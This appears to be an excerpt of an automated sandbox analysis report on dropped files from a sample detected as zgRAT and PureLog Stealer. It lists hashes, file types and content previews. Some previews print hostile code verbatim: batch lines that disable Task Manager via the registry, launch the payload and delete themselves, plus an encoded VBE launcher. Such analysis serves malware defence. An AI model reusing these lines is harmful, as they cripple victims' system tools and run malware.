                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Temp\4aWztmXmFN

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\Fb3iea6OWL

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\GOdToCbXiF

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\HPkqum5v1R

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\IDyV8Ed727

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):219
                                                                                                                  Entropy (8bit):5.307170642846334
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1WD5WAHovKOZG1wkn23fDi:HTg9uYDEoWffbi
                                                                                                                  MD5:2B0484A9BFA00886E410C27A66725717
                                                                                                                  SHA1:6E3D05D27E4DC13767F496000CF4CE0FF29DADB7
                                                                                                                  SHA-256:558A97B59B446E369EE0517ABFDA0342A1C5D8FD6956938C8E3B52D42FE37842
                                                                                                                  SHA-512:FE4D2CDA7BFD3A66202991A66C07207F5EBAF66CE8E9AE872695EEF6B98BCE351DD5F2EC641DD000C2D19052F8090C6DE79818A8E8CEB46A44898552EF9CE05D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\IwAYZ2SgOs.bat"

                                                                                                                  C:\Users\user\AppData\Local\Temp\O7HX44NWD5

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\Qr3FJXDRMS

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\dcOvT9Nv8m

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.023465189601646
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:z28dMch:z2Uh
                                                                                                                  MD5:C8327C8932A13954AEFC423516FD2AAA
                                                                                                                  SHA1:1F6D21D17BF96CA0B0E5E6CAD8B3B50E8853B205
                                                                                                                  SHA-256:A13BF1A460900871E9A0D514DC61BA74741A14BCAE9B9AB7053AB370E28D431E
                                                                                                                  SHA-512:AE96C536E57F1FA60D73CBB0C3E760C5F705D9952661B9791A14A709E2B4CD7F2FE25669FE94B3F092FE94125123B8338980B3DE146DDB76EB14706AD0ADD528
                                                                                                                  Malicious:false
                                                                                                                  Preview:0XQkvaaQc5CXBUMzjQhmamLMY

                                                                                                                  C:\Users\user\AppData\Local\Temp\gEsSaYNVhV

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.293660689688185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ktAmYn:ktLY
                                                                                                                  MD5:006B3D82ACB281E4F3BEEA4237096A50
                                                                                                                  SHA1:D76466BF350F5967EDA17BCEB3A893A54DBBC479
                                                                                                                  SHA-256:FC88EB9355D81FAA9FFE363D035E1198EE453C662A5B5A49067743B0303C87D0
                                                                                                                  SHA-512:097D7CABB1F6021B9484301DB6D0EC691307DBEACDA04D787FE6D2BA1D181EC81287D90A408DAF4C31AD6A9332967BC654D77227F4ACA7B9322B6A5AC9609097
                                                                                                                  Malicious:false
                                                                                                                  Preview:lsdIle5hWQ9FWhYMoX4RlrCjN

                                                                                                                  C:\Users\user\AppData\Local\Temp\hlQ0MxYJ8z

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49152
                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\iaIWXzkw2c

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\oZ8Xy9OVEX

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\s64qcwfi16

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\vfrpdsrKpp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\4219fd7e0c083a

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):119
                                                                                                                  Entropy (8bit):5.624578137290537
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:G4kTbauFwCWUKSVdQ5nBY8CdYecHDNnZnVZTiIfw9D:Ra2uJJVISuJZfiIgD
                                                                                                                  MD5:A4359DA3ECA1D4FDC5DFA7430D9A875A
                                                                                                                  SHA1:79119EB631D72740BC951F8CCE15ED7BF2A4EB8F
                                                                                                                  SHA-256:7E6601792F792EC44A8EA39E10F51D22D89D17F7D265DABE31E80704E5A20D13
                                                                                                                  SHA-512:E893A274E2C4BB0E3D3D779F7D38B4B4D93F28E9CC7122702F2481D959EA3D9E4BA9D67CF2BB80477DE2C2BEC967B42422168EDD2D4C0509C219368736D4281C
                                                                                                                  Malicious:false
                                                                                                                  Preview:3WFy0cc7ddJqL2v4U9LlK2Rw824VUgTuq0EUl4QLAvAvJwQIxEFtBp6BESz7iHn7JY9VxaTZs9lY1fnMmvhPbksB3CQSFTn3IDmuw4UXvpBCEhJionVwjXf

                                                                                                                  C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                  C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):233
                                                                                                                  Entropy (8bit):5.305875788535952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:3YwZAQGoBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKHgcAcLEoMGwXKAyA:7+QGcStuH1jhRiI36B1ylOvRH1CUUX8
                                                                                                                  MD5:0118E08ABDA66456BD63E2BCC55D05B2
                                                                                                                  SHA1:64387CA359C51E4B5AD571A5785582173EFB9969
                                                                                                                  SHA-256:573FAD0F77FFC485919076815A6EEC0D81ED693FD0D1EB64C1349F2E3969B709
                                                                                                                  SHA-512:E1956EDC77FE34141F9169C895E277053F914F3608107E14182898F54F4DA24E2E78CFCCC1B6E6A3DCF47CE9500C0A933D7D4184C999DA60218543E4697D6562
                                                                                                                  Malicious:false
                                                                                                                  Preview:%wCJWFzT%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%SwQ%..%ImbymPb%"%AppData%\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"%PZPSNyOzVeKF%

                                                                                                                  C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):271
                                                                                                                  Entropy (8bit):6.022320481512106
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:GzWvwqK+NkLzWbHY08nZNDd3RL1wQJRZ7SpQofri+DDdiIgRhb7wtR1:Ga2MCzWLY04d3XBJr7SpDri+DDdcRNG7
                                                                                                                  MD5:6C5F55FA14BA94A77A32D2D9F01E75C9
                                                                                                                  SHA1:069A1690C9143193F4FBAB01ED46DBC690EF06B3
                                                                                                                  SHA-256:C8149BF4A25A4E56D82163BC6C3A61FF83BAF6280E04C1B6BB58E616B1451D3A
                                                                                                                  SHA-512:25F1BF1803C23253FDB0CC83338FB5CE390292F2B802B5E06FDAABE1367EA4BAE9EBA8504C486B3894C8195E50D4782B8858B3D0B42C4FCE33BBC3CEE32B6E05
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:#@~^9gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zJSK^l^z[kkmG.9z/!.DKolDn.k.HKxrYG.9VszJ3Sbc(4oF+uh5 i/m6b+UIoGyqWCnUXg91}"h!ezDn_(p:m/dn 4mYr~~!S~6ls/.QFAAAA==^#~@.

                                                                                                                  C:\Users\user\Desktop\GoOOBNnj.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
